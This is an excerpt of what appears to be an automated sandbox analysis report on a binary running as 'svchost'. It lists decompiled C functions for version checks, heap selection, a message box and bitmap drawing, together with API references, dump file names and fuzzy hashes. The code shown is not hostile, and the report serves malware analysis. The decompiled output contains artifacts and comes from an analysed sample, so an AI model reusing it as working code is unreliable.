    • PtInRect.USER32(?,?,?), ref: 0048A7DA
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Rect$ClientCtrlLongScreen
    • String ID:
    • API String ID: 1315500227-0
    • Opcode ID: 00aa574261bec83990b361e16fbf3eb1bc5b68cc18f681937182140a40bb976a
    • Instruction ID: 5542302c3d32a285f0899f395a76ada6a8ede07d9cc367b545ee20455361ca98
    • Opcode Fuzzy Hash: 00aa574261bec83990b361e16fbf3eb1bc5b68cc18f681937182140a40bb976a
    • Instruction Fuzzy Hash: 2C018F36500125BBEB11AB64DC08EAFB77CEF54B10F404433F91192160E7B8D9269B99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0046E090 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 211libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E0046E090(signed int __ecx, signed int* _a4) {
				char _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				void _v148;
				void* _v156;
				struct HINSTANCE__* _t57;
				signed int _t66;
				void* _t71;
				signed int _t76;
				void* _t78;
				signed int _t92;
				signed int* _t97;
				signed int _t113;
				unsigned int _t115;
				signed int _t116;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				unsigned int _t131;
				signed int _t132;
				intOrPtr* _t138;
				void* _t142;
				signed int _t178;
				void* _t179;
				void* _t180;
				void* _t182;
				void* _t183;
				signed int _t184;

				_t97 = _a4;
				_t184 = __ecx;
				_t97[0x24] = 0;
				_t97[0x49] = 0;
				_t57 = GetModuleHandleA("KERNEL32.DLL");
				if(_t57 != 0) {
					_t138 = GetProcAddress(_t57, "GetVersionExA");
					if(_t138 == 0) {
						_t178 = GetVersion() & 0x000000ff;
						_t97[2] = 0;
						_t97[1] = 0;
						_t97[0x26] = 0;
						_t97[0x27] = 0;
						 *_t97 = _t178;
						_t97[3] = 4;
						_t97[0x25] = _t178;
						_t97[0x28] = 4;
						asm("repne scasb");
						_t179 =  &(_t97[4]) - 0xffffffff;
						memcpy(_t179 + 0x175b75a, _t179, memcpy( &(_t97[0x29]), _t179, 0xffffffff << 2) & 0x00000003);
						_t66 = E0046E5F0();
						_t97[0x24] = _t66;
						_t97[0x49] = _t66;
						return 1;
					} else {
						memset( &_v148, 0, 0x25 << 2);
						_v148 = 0x94;
						_t71 =  *_t138( &_v148);
						if(_t71 != 0) {
							_t113 = _v148;
							 *_t97 = _t113;
							_t97[2] = _v140 & 0x0000ffff;
							asm("repne scasb");
							_t115 =  !(_t113 | 0xffffffff);
							_t97[1] = _v144;
							_t142 =  &(_t97[4]);
							_t180 =  &_v132 - _t115;
							_t116 = _t115 >> 2;
							_t76 = memcpy(_t142, _t180, _t116 << 2);
							_v156 = _t142;
							_t78 = memcpy(_t180 + _t116 + _t116, _t180, _t76 & 0x00000003);
							_t120 = 0;
							if(_t78 != 1) {
								if(_t78 != 2) {
									if(_t78 != 3) {
										goto L11;
									} else {
										_t97[3] = 5;
										goto L18;
									}
								} else {
									_t97[3] = 4;
									_t120 = _t184;
									_t92 = E0046E590(_t120,  &_v132);
									_t97[0x24] = _t92;
									_t97[0x49] = _t92;
									goto L11;
								}
							} else {
								_t120 = _t184;
								_t97[3] = 3;
								if(E0046E390(_t97) != 0) {
									L10:
									_t97[0x24] = 1;
									_t97[0x49] = 1;
								} else {
									_t120 = _t184;
									if(E0046E3D0(_t97) == 0) {
										_t120 = _t184;
										if(E0046E450(_t97) != 0) {
											goto L10;
										}
									} else {
										_t97[0x24] = 2;
										_t97[0x49] = 2;
									}
								}
								L11:
								if(_v136 != 0) {
									_t142 = _v156;
									L18:
									_t97[0x25] =  *_t97;
									_t122 = _t97[2];
									_t97[0x26] = _t97[1];
									_t97[0x27] = _t122;
									_t97[0x28] = _t97[3];
									asm("repne scasb");
									_t124 =  !(_t122 | 0xffffffff);
									_t182 = _t142 - _t124;
									_t125 = _t124 >> 2;
									memcpy( &(_t97[0x29]), _t182, _t125 << 2);
									return memcpy(_t182 + _t125 + _t125, _t182, _t124 & 0x00000003);
								} else {
									_t97[0x28] = 2;
									_t97[3] = 3;
									_t97[0x25] = 3;
									_t97[0x26] = 0xa;
									_t97[0x27] = 0;
									asm("repne scasb");
									_t131 =  !(_t120 | 0xffffffff);
									_t183 = 0x4d9700 - _t131;
									_t132 = _t131 >> 2;
									return memcpy(_t183 + _t132 + _t132, _t183, memcpy( &(_t97[0x29]), _t183, _t132 << 2) & 0x00000003);
								}
							}
						} else {
							return _t71;
						}
					}
				} else {
					return 0;
				}
			}

































    0x0046e097
    0x0046e0a3
    0x0046e0aa
    0x0046e0b1
    0x0046e0b8
    0x0046e0c0
    0x0046e0dd
    0x0046e0e1
    0x0046e2c8
    0x0046e2d7
    0x0046e2da
    0x0046e2e2
    0x0046e2e8
    0x0046e2f6
    0x0046e2f8
    0x0046e2fb
    0x0046e301
    0x0046e30d
    0x0046e315
    0x0046e323
    0x0046e327
    0x0046e32e
    0x0046e335
    0x0046e349
    0x0046e0e7
    0x0046e0f2
    0x0046e0f8
    0x0046e101
    0x0046e105
    0x0046e118
    0x0046e121
    0x0046e123
    0x0046e12f
    0x0046e135
    0x0046e139
    0x0046e13c
    0x0046e141
    0x0046e145
    0x0046e148
    0x0046e153
    0x0046e157
    0x0046e157
    0x0046e165
    0x0046e224
    0x0046e24f
    0x00000000
    0x0046e255
    0x0046e255
    0x00000000
    0x0046e255
    0x0046e226
    0x0046e22a
    0x0046e232
    0x0046e234
    0x0046e239
    0x0046e240
    0x00000000
    0x0046e240
    0x0046e16b
    0x0046e16c
    0x0046e16e
    0x0046e17c
    0x0046e1a6
    0x0046e1a6
    0x0046e1ad
    0x0046e17e
    0x0046e17f
    0x0046e188
    0x0046e19b
    0x0046e1a4
    0x00000000
    0x00000000
    0x0046e18a
    0x0046e18a
    0x0046e191
    0x0046e191
    0x0046e188
    0x0046e1b4
    0x0046e1ba
    0x0046e25e
    0x0046e262
    0x0046e267
    0x0046e26d
    0x0046e270
    0x0046e279
    0x0046e27f
    0x0046e292
    0x0046e294
    0x0046e29f
    0x0046e2a3
    0x0046e2a6
    0x0046e2b9
    0x0046e1c0
    0x0046e1c5
    0x0046e1cb
    0x0046e1ce
    0x0046e1de
    0x0046e1e8
    0x0046e1f8
    0x0046e1fa
    0x0046e200
    0x0046e204
    0x0046e21f
    0x0046e21f
    0x0046e1ba
    0x0046e111
    0x0046e111
    0x0046e111
    0x0046e105
    0x0046e0c5
    0x0046e0ce
    0x0046e0ce

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,74715400,?,00000000), ref: 0046E0B8
    • GetProcAddress.KERNEL32(00000000,GetVersionExA), ref: 0046E0D7
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: GetVersionExA$KERNEL32.DLL
    • API String ID: 1646373207-579392977
    • Opcode ID: b9fd26a8452a3f5e6ee7d4593aeb7295229aa5203e7fef9d2564f7c2ea97ad05
    • Instruction ID: 55c3d0b70aa33324e609945cb42cd12f9c3393deba576fca954bc37d40e81545
    • Opcode Fuzzy Hash: b9fd26a8452a3f5e6ee7d4593aeb7295229aa5203e7fef9d2564f7c2ea97ad05
    • Instruction Fuzzy Hash: EE717F766102008BDB14CF29D8917A6B7D5EF89320F18857EED0DCF386EB798805C76A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004261B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 181COMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E004261B0(void* __eflags, intOrPtr __fp0, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;
				void* _v52;
				signed int _v56;
				int _v60;
				void* _v72;
				char _v76;
				char _v80;
				intOrPtr _v92;
				char _v96;
				signed int _v104;
				char _v108;
				intOrPtr _v112;
				void* _v120;
				char _v124;
				void* _v136;
				void* _v144;
				void* _v148;
				void* _v156;
				void* __ebp;
				void* _t63;
				struct HICON__* _t64;
				intOrPtr _t123;
				struct HICON__* _t125;
				intOrPtr _t126;
				struct HICON__* _t131;
				void* _t136;
				intOrPtr _t142;
				void* _t143;

				_push(0xffffffff);
				_push(E0048F010);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t142;
				_t143 = _t142 - 0x44;
				_t130 = _a8;
				_t122 = _a4;
				_t136 = E004267F0(_a4, _a8);
				if(_t136 != 0) {
					_t131 = E00425870(_t136, _t122, _t130);
					__eflags = _t131;
					if(__eflags != 0) {
						_push(0);
						_v32 = 0;
						_v36 = 0;
						_v20 = 0;
						_v16 = 0;
						_v28 = 0;
						_v24 = 0;
						_t123 = 0;
						E00489C16( &_v56, __eflags);
						_v8 = 0;
						_t63 = E00425950(__fp0,  &_v60, _t131,  &_v40, _a8);
						__eflags = _t63 - 1;
						if(_t63 == 1) {
							__eflags = _t136 - 3;
							if(_t136 == 3) {
								L8:
								E004892C7( &_v76);
								asm("sbb eax, eax");
								_v8 = 1;
								E0048937E( &_v80, CreateCompatibleDC( ~( &_v60) & _v56));
								 *((intOrPtr*)(_t143 + 0x14)) = 0;
								_v92 = 0x496a58;
								_v16 = 2;
								E00489EBE( &_v104, CreateCompatibleBitmap( *(_t143 + 0x2c), _v40, _v36));
								_t31 =  &_v108; // 0x496a58
								asm("sbb eax, eax");
								_t125 = E004894BF(_v96,  ~_t31 & _v104);
								PatBlt(_v104, 0, 0,  *(_t143 + 0x44), _v60, 0xff0062);
								_v96 =  *((intOrPtr*)(_t143 + 0x1c));
								E00425D90( *((intOrPtr*)(_t143 + 0x1c)),  &_v96, 0, 0, 0xffffffff, 0xffffffff, 0xcc0020);
								__eflags = _t125;
								if(_t125 != 0) {
									_t126 =  *((intOrPtr*)(_t125 + 4));
								} else {
									_t126 = 0;
								}
								E004894BF(_v112, _t126);
								_t41 = _t143 + 0x10; // 0x496a58
								_t123 = E00489EEB(_t41);
								 *((intOrPtr*)(_t143 + 0x10)) = 0x496a4c;
								_t43 = _t143 + 0x10; // 0x496a4c
								_v56 = 3;
								E00489F15(_t43);
								_v56 = 0;
								E004893FC( &_v124);
							} else {
								__eflags = _t136 - 4;
								if(_t136 == 4) {
									goto L8;
								} else {
									_t123 = _v20;
									_v20 = 0;
								}
							}
							E004260F0( &_v80);
						}
						_t64 =  *(_t131 + 0xc);
						_t131->i = 0;
						__eflags = _t64;
						 *((intOrPtr*)(_t131 + 4)) = 0;
						 *((intOrPtr*)(_t131 + 8)) = 0;
						 *((intOrPtr*)(_t131 + 0x14)) = 0;
						if(_t64 != 0) {
							DestroyCursor(_t64);
							 *(_t131 + 0xc) = 0;
						}
						_t65 =  *(_t131 + 0x10);
						__eflags =  *(_t131 + 0x10);
						if(__eflags != 0) {
							E0048302C(_t65);
							_t143 = _t143 + 4;
							 *(_t131 + 0x10) = 0;
						}
						E0048302C(_t131);
						_v8 = 0xffffffff;
						E00489C88( &_v60, __eflags);
						 *[fs:0x0] = _v16;
						return _t123;
					} else {
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}







































    0x004261b6
    0x004261b8
    0x004261bd
    0x004261be
    0x004261c5
    0x004261cb
    0x004261d0
    0x004261db
    0x004261e1
    0x004261ff
    0x00426201
    0x00426203
    0x0042621a
    0x0042621f
    0x00426223
    0x00426227
    0x0042622b
    0x0042622f
    0x00426233
    0x00426237
    0x00426239
    0x0042624e
    0x00426252
    0x00426257
    0x0042625a
    0x00426260
    0x00426263
    0x00426277
    0x0042627b
    0x0042628a
    0x0042628c
    0x0042629f
    0x004262a4
    0x004262a8
    0x004262bf
    0x004262cf
    0x004262d8
    0x004262de
    0x004262fb
    0x00426305
    0x0042631f
    0x00426323
    0x00426328
    0x0042632a
    0x00426330
    0x0042632c
    0x0042632c
    0x0042632c
    0x00426339
    0x0042633e
    0x00426347
    0x00426349
    0x00426351
    0x00426355
    0x0042635a
    0x00426363
    0x00426367
    0x00426265
    0x00426265
    0x00426268
    0x00000000
    0x0042626a
    0x0042626a
    0x0042626e
    0x0042626e
    0x00426268
    0x00426371
    0x00426371
    0x00426376
    0x00426379
    0x0042637b
    0x0042637d
    0x00426380
    0x00426383
    0x00426386
    0x00426389
    0x0042638f
    0x0042638f
    0x00426392
    0x00426395
    0x00426397
    0x0042639a
    0x0042639f
    0x004263a2
    0x004263a2
    0x004263a6
    0x004263b2
    0x004263ba
    0x004263c9
    0x004263d3
    0x00426205
    0x00426208
    0x0042620f
    0x00426219
    0x00426219
    0x004261e3
    0x004261ed
    0x004261f7
    0x004261f7

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: XjI
    • API String ID: 0-234675203
    • Opcode ID: 7f36fb9c0be06620688f6e163ee5c2e8d6595ac97fcb3065c9d8a741c963659f
    • Instruction ID: 3c2e617f6b18db470dae2fce2bbe79e454e24b6ff248d4784e2a9fc24e032d88
    • Opcode Fuzzy Hash: 7f36fb9c0be06620688f6e163ee5c2e8d6595ac97fcb3065c9d8a741c963659f
    • Instruction Fuzzy Hash: 92515AB25087519FC310EF69D88096FFBE8BB89714F448E2EF5A583240D779D809CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00474CC9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00474CC9(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00471390(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00474C9C( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00470280("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E00471B70( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00471C80(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E00473C08(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}


















    0x00474cd1
    0x00474cde
    0x00474cf0
    0x00474d06
    0x00000000
    0x00474d06
    0x00474d25
    0x00474dfb
    0x00474dff
    0x00474e09
    0x00000000
    0x00474e0b
    0x00474d2d
    0x00474d39
    0x00474d3b
    0x00474d3b
    0x00474d3f
    0x00474d47
    0x00474d47
    0x00474d49
    0x00474d4a
    0x00474d3b
    0x00474d66
    0x00474d7d
    0x00474d89
    0x00474d8f
    0x00474d91
    0x00474d91
    0x00474d95
    0x00474d9d
    0x00474d9d
    0x00474d9f
    0x00474da0
    0x00474d91
    0x00474db2
    0x00474d68
    0x00474d68
    0x00474d68
    0x00474dbb
    0x00000000
    0x00000000
    0x00474dc0
    0x00474dc9
    0x00000000
    0x00000000
    0x00474dcb
    0x00474dcc
    0x00474dd0
    0x00474dd2
    0x00474dd5
    0x00474ddb
    0x00474dd7
    0x00474dd7
    0x00474dd7
    0x00474ddc
    0x00474dd2
    0x00474de4
    0x00474def
    0x00000000
    0x00000000
    0x00474e10

    APIs
    • GetVersionExA.KERNEL32 ref: 00474CE8
    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00474D1D
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00474D7D
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnvironmentFileModuleNameVariableVersion
    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
    • API String ID: 1385375860-4131005785
    • Opcode ID: 0c73f020cf8bb1e2da261f5da72e3e1293850ec5ba4f1064243c60b53610c3cf
    • Instruction ID: 09e23c8e2169c8f26c5db60c5e0b5cc194c3271f0ec15cee981eb308adf3adc4
    • Opcode Fuzzy Hash: 0c73f020cf8bb1e2da261f5da72e3e1293850ec5ba4f1064243c60b53610c3cf
    • Instruction Fuzzy Hash: 933126719012986EEB3597B45C51BFE37689B42304F2484EBD1CDC6252E73C8EC9CB19
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048ACE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87windowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048ACE9(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v280;
				struct HWND__* _t23;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				int _t38;
				intOrPtr _t41;
				CHAR* _t42;
				int _t43;
				long _t44;

				_t41 = __ecx;
				_v20 = __ecx;
				E0048ACBB(0);
				_t23 = E0048AE61(0,  &_v8);
				_t44 = 0;
				_v16 = _t23;
				if(_t23 == 0) {
					L3:
					if(_t41 != 0) {
						_t5 = _t41 + 0x9c; // 0x9c
						_t44 = _t5;
					}
					L5:
					_v12 = 0;
					if(_t44 != 0) {
						_v12 =  *_t44;
						_t34 = _a12;
						if(_t34 != 0) {
							 *_t44 = _t34 + 0x30000;
						}
					}
					_t38 = _a8;
					if((_t38 & 0x000000f0) == 0) {
						_t32 = _t38 & 0x0000000f;
						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
							_t38 = _t38 | 0x00000030;
						}
					}
					if(_t41 == 0) {
						_t42 =  &_v280;
						GetModuleFileNameA(0,  &_v280, 0x104);
					} else {
						_t42 =  *(_t41 + 0x78);
					}
					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
					if(_t44 != 0) {
						 *_t44 = _v12;
					}
					if(_v8 != 0) {
						EnableWindow(_v8, 1);
					}
					E0048ACBB(1);
					return _t43;
				}
				_t36 = SendMessageA(_v8, 0x376, 0, 0);
				if(_t36 == 0) {
					goto L3;
				} else {
					_t44 = _t36;
					goto L5;
				}
			}

















    0x0048acf7
    0x0048acfa
    0x0048acfd
    0x0048ad07
    0x0048ad0c
    0x0048ad10
    0x0048ad13
    0x0048ad2d
    0x0048ad2f
    0x0048ad31
    0x0048ad31
    0x0048ad31
    0x0048ad37
    0x0048ad39
    0x0048ad3c
    0x0048ad40
    0x0048ad43
    0x0048ad48
    0x0048ad4f
    0x0048ad4f
    0x0048ad48
    0x0048ad51
    0x0048ad57
    0x0048ad5b
    0x0048ad61
    0x0048ad6d
    0x0048ad6d
    0x0048ad61
    0x0048ad72
    0x0048ad87
    0x0048ad8d
    0x0048ad74
    0x0048ad74
    0x0048ad74
    0x0048ada3
    0x0048ada5
    0x0048adaa
    0x0048adaa
    0x0048adb0
    0x0048adb7
    0x0048adb7
    0x0048adc2
    0x0048adcd
    0x0048adcd
    0x0048ad1f
    0x0048ad27
    0x00000000
    0x0048ad29
    0x0048ad29
    0x00000000
    0x0048ad29

    APIs
      • Part of subcall function 0048AE61: GetParent.USER32(?), ref: 0048AE94
      • Part of subcall function 0048AE61: GetLastActivePopup.USER32(?), ref: 0048AEA3
      • Part of subcall function 0048AE61: IsWindowEnabled.USER32(?), ref: 0048AEB8
      • Part of subcall function 0048AE61: EnableWindow.USER32(?,00000000), ref: 0048AECB
    • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0048AD1F
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0048AD8D
    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 0048AD9B
    • EnableWindow.USER32(00000000,00000001), ref: 0048ADB7
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
    • String ID: P8H
    • API String ID: 1958756768-4234511099
    • Opcode ID: dab508968a35e1337f3707866c5c45a5c509192bf03a1b4d91a8c4cf7d0ebfa1
    • Instruction ID: fbd98c79f6c6667c5b00a0fb988db7701a7e3effe201aa7421a71902ea7d835c
    • Opcode Fuzzy Hash: dab508968a35e1337f3707866c5c45a5c509192bf03a1b4d91a8c4cf7d0ebfa1
    • Instruction Fuzzy Hash: 1821A272900108AFEB20EFA4CC81AEEB7F6EB44715F14083BE651E7690D7B99D508B56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00418BA0 Relevance: 7.9, APIs: 5, Instructions: 351COMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E00418BA0(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t142;
				signed int _t144;
				void* _t146;
				void* _t149;
				signed int _t150;
				intOrPtr* _t151;
				struct tagRECT _t156;
				signed int _t168;
				void* _t170;
				void* _t171;
				signed int _t176;
				signed int _t177;
				signed int _t195;
				void* _t208;
				intOrPtr* _t215;
				void* _t216;
				void* _t217;
				signed int _t219;
				void* _t222;
				void* _t223;
				void* _t226;
				intOrPtr _t229;
				void* _t230;
				void* _t231;
				void* _t232;

				_push(0xffffffff);
				_push(E0048E6A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t229;
				_t230 = _t229 - 0x30;
				 *((intOrPtr*)(_t230 + 0x14)) = __ecx;
				 *((intOrPtr*)(_t230 + 0x18)) = 0;
				 *((intOrPtr*)(_t230 + 0x1c)) = 0;
				if(E00413AB0(__ecx + 0x104, __eflags,  *((intOrPtr*)(_t230 + 0x48)), _t230 + 0x48, 0) != 0) {
					_t142 = E00413630( *((intOrPtr*)(_t230 + 0x48)) + 0x14, __eflags,  *((intOrPtr*)(_t230 + 0x50)), 0, 0);
					_t183 = _t230 + 0x2c;
					_t215 = _t142;
					E0040B5D0(_t230 + 0x2c);
					 *((intOrPtr*)(_t230 + 0x4c)) = 0;
					_t144 = E00413C60(__eflags,  *((intOrPtr*)(_t230 + 0x50)));
					_t231 = _t230 + 4;
					__eflags = _t144;
